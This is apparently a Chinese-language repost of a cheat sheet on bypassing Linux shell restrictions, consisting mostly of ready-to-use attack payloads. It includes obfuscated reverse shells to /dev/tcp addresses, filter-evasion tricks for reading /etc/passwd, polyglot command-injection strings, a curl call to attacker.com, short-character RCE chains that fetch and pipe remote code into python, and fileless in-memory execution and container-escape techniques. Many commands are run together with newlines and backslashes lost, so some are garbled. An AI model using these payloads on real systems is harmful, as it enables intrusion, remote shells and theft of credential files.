常见限制绕过
反向 Shell
# Double-Base64 is a great way to avoid bad characters like +, works 99% of the timeecho "echo $(echo 'bash -i >& /dev/tcp/10.10.14.8/4444 0>&1' | base64 | base64)|ba''se''6''4 -''d|ba''se''64 -''d|b''a''s''h" | sed 's/ /${IFS}/g'# echo${IFS}WW1GemFDQXRhU0ErSmlBdlpHVjJMM1JqY0M4eE1DNHhNQzR4TkM0NEx6UTBORFFnTUQ0bU1Rbz0K|ba''se''6''4${IFS}-''d|ba''se''64${IFS}-''d|b''a''s''h
Short Rev shell
#Trick from Dikline#Get a rev shell with(sh)0>/dev/tcp/10.10.10.10/443#Then get the out of the rev shell executing inside of it:exec >&0
绕过路径和禁用词
# Question mark binary substitution/usr/bin/p?ng # /usr/bin/pingnma? -p 80 localhost # /usr/bin/nmap -p 80 localhost# Wildcard(*) binary substitution/usr/bin/who*mi # /usr/bin/whoami# Wildcard + local directory argumentstouch -- -la # -- stops processing options after the --ls *echo * #List current files and folders with echo and wildcard# [chars]/usr/bin/n[c] # /usr/bin/nc# Quotes'p'i'n'g # ping"w"h"o"a"m"i # whoamiech''o test # echo testech""o test # echo testbas''e64 # base64#Backslashesuname -a # uname -a/bin/////sh# $@who$@ami #whoami# Transformations (case, reverse, base64)$(tr "[A-Z]" "[a-z]"<<<"WhOaMi") #whoami -> Upper case to lower case$(a="WhOaMi";printf %s "${a,,}") #whoami -> transformation (only bash)$(rev<<<'imaohw') #whoamibash<<<$(base64 -d<<<Y2F0IC9ldGMvcGFzc3dkIHwgZ3JlcCAzMw==) #base64# Execution through $0echo whoami|$0# Uninitialized variables: A uninitialized variable equals to null (nothing)cat$u /etc$u/passwd$u # Use the uninitialized variable without {} before any symbolp${u}i${u}n${u}g # Equals to ping, use {} to put the uninitialized variables between valid characters# New linesping # These 4 lines will equal to ping# Fake commandsp$(u)i$(u)n$(u)g # Equals to ping but 3 errors trying to execute "u" are shownw`u`h`u`o`u`a`u`m`u`i # Equals to whoami but 5 errors trying to execute "u" are shown# Concatenation of strings using history!-1 # This will be substitute by the last command executed, and !-2 by the penultimate commandmi # This will throw an errorwhoa # This will throw an error!-1!-2 # This will execute whoami
绕过禁区
# {form}{cat,lol.txt} # cat lol.txt{echo,test} # echo test# IFS - Internal field separator, change " " for any other character ("]" in this case)cat${IFS}/etc/passwd # cat /etc/passwdcat$IFS/etc/passwd # cat /etc/passwd# Put the command line in a variable and then execute itIFS=];b=wget]10.10.14.21:53/lol]-P]/tmp;$bIFS=];b=cat]/etc/passwd;$b # Using 2 ";"IFS=,;`cat<<<cat,/etc/passwd` # Using cat twice# Other way, just change each space for ${IFS}echo${IFS}test# Using hex formatX=$'catx20/etc/passwd'&&$X# Using tabsecho "lsx09-l" | bash# Undefined variables and !$u $u # This will be saved in the history and can be used as a space, please notice that the $u variable is undefineduname!-1-a # This equals to uname -a
绕过反斜杠和斜杠
cat ${HOME:0:1}etc${HOME:0:1}passwdcat $(echo . | tr '!-0' '"-1')etc$(echo . | tr '!-0' '"-1')passwd
旁通管
bash<<<$(base64 -d<<<Y2F0IC9ldGMvcGFzc3dkIHwgZ3JlcCAzMw==)使用十六进制编码绕过
echo -e "x2fx65x74x63x2fx70x61x73x73x77x64"cat `echo -e "x2fx65x74x63x2fx70x61x73x73x77x64"`abc=$'x2fx65x74x63x2fx70x61x73x73x77x64';cat abc`echo $'catx20x2fx65x74x63x2fx70x61x73x73x77x64'`cat `xxd -r -p <<< 2f6574632f706173737764`xxd -r -ps <(echo 2f6574632f706173737764)cat `xxd -r -ps <(echo 2f6574632f706173737764)`
绕过 IP
# Decimal IPs127.0.0.1 == 2130706433
基于时间的数据泄露
time if [ $(whoami|cut -c 1) == s ]; then sleep 5; fi从环境变量中获取字符
echo ${LS_COLORS:10:1} #;echo ${PATH:0:1} #/
DNS 数据泄露
例如,您可以使用burpcollab或pingb内置
如果你无法执行外部函数,并且只能访问一组有限的内置函数来获得 RCE,那么有一些方便的技巧可以做到这一点。通常你无法使用所有的内置函数,所以你应该知道所有的选项来尝试绕过监狱。来自devploit的想法。首先检查所有的shell 内置函数。然后这里有一些建议:
# Get list of builtinsdeclare builtins# In these cases PATH won't be set, so you can try to set itPATH="/bin" /bin/lsexport PATH="/bin"declare PATH="/bin"SHELL=/bin/bash# Hex$(echo -e "x2fx62x69x6ex2fx6cx73")$(echo -e "x2fx62x69x6ex2fx6cx73")# Inputread aaa; exec $aaa #Read more commands to execute and execute themread aaa; eval $aaa# Get "/" char using printf and env varsprintf %.1s "$PWD"## Execute /bin/ls$(printf %.1s "$PWD")bin$(printf %.1s "$PWD")ls## To get several letters you can use a combination of printf anddeclaredeclare functionsdeclare historywords# Read flag in current dirsource f*flag.txt:1: command not found: CTF{asdasdasd}# Read file with readwhile read -r line; do echo $line; done < /etc/passwd# Get env variablesdeclare# Get historyhistorydeclare historydeclare historywords# Disable special builtins chars so you can abuse them as scripts[ #[: ']' expected## Disable "[" as builtin and enable it as scriptenable -n [echo -e '#!/bin/bashnecho "hello!"' > /tmp/[chmod +x [export PATH=/tmp:$PATHif [ "a" ]; then echo 1; fi # Will print hello!
多语言命令注入
1;sleep${IFS}9;#${IFS}';sleep${IFS}9;#${IFS}";sleep${IFS}9;#${IFS}/*$(sleep 5)`sleep 5``*/-sleep(5)-'/*$(sleep 5)`sleep 5` #*/-sleep(5)||'"||sleep(5)||"/*`*/
绕过潜在的正则表达式
# A regex that only allow letters and numbers might be vulnerable to new line characters1%0a`curl http://attacker.com`
模糊处理器
# From https://github.com/Bashfuscator/Bashfuscator./bashfuscator -c 'cat /etc/passwd'
5 个字符的 RCE
# From the Organge Tsai BabyFirst Revenge challenge: https://github.com/orangetw/My-CTF-Web-Challenges#babyfirst-revenge#Oragnge Tsai solution## Step 1: generate `ls -t>g` to file "_" to be able to execute ls ordening names by cration datehttp://host/?cmd=>lshttp://host/?cmd=ls>_http://host/?cmd=>http://host/?cmd=>-thttp://host/?cmd=>>ghttp://host/?cmd=ls>>_## Step2: generate `curl orange.tw|python` to file "g"## by creating the necesary filenames and writting that content to file "g" executing the previous generated filehttp://host/?cmd=>onhttp://host/?cmd=>thhttp://host/?cmd=>pyhttp://host/?cmd=>|http://host/?cmd=>twhttp://host/?cmd=>e.http://host/?cmd=>nghttp://host/?cmd=>rahttp://host/?cmd=>ohttp://host/?cmd=>http://host/?cmd=>rlhttp://host/?cmd=>cuhttp://host/?cmd=sh _# Note that a "" char is added at the end of each filename because "ls" will add a new line between filenames whenwritting to the file## Finally execute the file "g"http://host/?cmd=sh g# Another solution from https://infosec.rm-it.de/2017/11/06/hitcon-2017-ctf-babyfirst-revenge/# Instead of writing scripts to a file, create an alphabetically ordered the command and execute it with "*"https://infosec.rm-it.de/2017/11/06/hitcon-2017-ctf-babyfirst-revenge/## Execute tar command over a folderhttp://52.199.204.34/?cmd=>tarhttp://52.199.204.34/?cmd=>zcfhttp://52.199.204.34/?cmd=>zzzhttp://52.199.204.34/?cmd=*%20/h*# Another curiosity if you can read files of the current folderln /f*## If there is a file /flag.txt that will create a hard link## to it in the current folder
4 个字符的 RCE
# In a similar fashion to the previous bypass this one just need 4 chars to execute commands# it will follow the same principle of creating the command `ls -t>g` in a file# and then generate the full command in filenames# generate "g> ht- sl" to file "v"'>dir''>sl''>g>''>ht-''*>v'# reverse file "v" to file "x", content "ls -th >g"'>rev''*v>x'# generate "curl orange.tw|python;"'>;\''>on\''>th\''>py\''>|\''>tw\''>e.\''>ng\''>ra\''>o\''> \''>rl\''>cu\'# got shell'sh x''sh g'
只读/Noexec/Distroless 绕过
如果你在具有只读和 noexec 保护的文件系统中,甚至在 distroless 容器中,仍然可以执行任意二进制文件,甚至是 shell!:
绕过 FS 保护:只读 / no-exec / Distroless只读/无执行场景
越来越常见的是,Linux 机器上安装了只读 (ro) 文件系统保护,尤其是在容器中。这是因为运行带有 ro 文件系统的容器就像readOnlyRootFilesystem: true在 中设置一样简单securitycontext:
apiVersion: v1kind: Podmetadata:name: alpine-podspec:containers:- name: alpineimage: alpinesecurityContext:readOnlyRootFilesystem: truecommand: ["sh", "-c", "while true; do sleep 1000; done"]
但是,即使文件系统被挂载为 ro,/dev/shm它仍然是可写的,所以我们无法在磁盘上写入任何内容。但是,此文件夹将以无执行保护方式挂载,因此如果您在此处下载二进制文件,您将无法执行它。
最简单的绕过方法:脚本
请注意,我提到了二进制文件,只要解释器在机器内部,您就可以执行任何脚本,例如如果存在则为shell 脚本,如果安装了则为python脚本。sh python
但是,这还不足以执行您可能需要运行的二进制后门或其他二进制工具。
内存旁路
如果您想执行二进制文件但文件系统不允许这样做,最好的方法是从内存中执行它,因为其中的保护不适用。
FD + exec 系统调用绕过
如果您的机器内部有一些强大的脚本引擎,例如Python,Perl或Ruby ,您可以下载二进制文件从内存中执行,将其存储在内存文件描述符(create_memfdsyscall )中,该描述符不会受到这些保护的保护,然后调用execsyscall指示fd 作为要执行的文件。
为此,您可以轻松使用项目fileless-elf-exec。您可以向其传递一个二进制文件,它将生成一个指定语言的脚本,该脚本使用压缩的二进制文件和 b64 编码,并在fd中解码和解压缩指令,创建调用系统调用并调用exec系统调用来运行它。create_memfd
DDexec / EverythingExec
DDexec/EverythingExec是一种允许您通过覆盖其来修改您自己的进程的内存/proc/self/mem的技术。
因此,通过控制进程正在执行的汇编代码,您可以编写shellcode并“变异”进程以执行任意代码。
# Basic examplewget -O- https://attacker.com/binary.elf | base64 -w0 | bash ddexec.sh argv0 foo bar
内存执行
Memexec是 DDexec 的自然下一步。它是恶魔化的 DDexec shellcode,因此每次您想要运行不同的二进制文件时,您都无需重新启动 DDexec,您只需通过 DDexec 技术运行 memexec shellcode,然后与此守护进程通信以传递要加载和运行的新二进制文件。
您可以在https://github.com/arget13/memexec/blob/main/a.php中找到有关如何使用memexec 从 PHP 反向 shell 执行二进制文件的示例。美沙酮
与 DDexec 的目的类似,memdlopen技术允许更轻松地将二进制文件加载到内存中,以便稍后执行它们。它甚至可以加载具有依赖关系的二进制文件。Distroless 绕过
什么是 distroless
Distroless 容器仅包含运行特定应用程序或服务所需的最少组件,例如库和运行时依赖项,但不包括较大的组件,例如包管理器、shell 或系统实用程序。
无发行版容器的目标是通过消除不必要的组件并最大限度地减少可被利用的漏洞数量来减少容器的攻击面。
反向 Shell
在无发行版容器中,您甚至可能找不到或sh无法bash获得常规 shell。您也无法找到通常在系统中运行的二进制文件,例如ls、、 ...。whoamiid
但是,如果受感染的容器正在运行 flask web 等程序,则表明安装了 python,因此您可以获取Python 反向 shell。如果它正在运行 node,则可以获取 Node rev shell,对于大多数脚本语言也是如此。
如果没有保护read-only/no-exec措施,您可能会滥用反向 shell在文件系统中写入二进制文件并执行它们。
Chroot 和其他 Jails 绕过
越狱
Chroot 逃逸
来自维基百科:chroot 机制并非旨在防止特权( root )用户的故意篡改。在大多数系统中,chroot 上下文无法正确堆叠,具有足够权限的 chroot 程序可能会执行第二次 chroot 以逃脱。通常,这意味着要逃脱,您需要在 chroot 中成为 root。
希望这些信息对您有所帮助!如果觉得这篇文章有价值,欢迎点赞、分享、再看、转载,如果您有网络安全的疑问,联系我随时为您解答,感谢您的支持!
原文始发于微信公众号(星空网络安全):绕过Linux系统限制
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论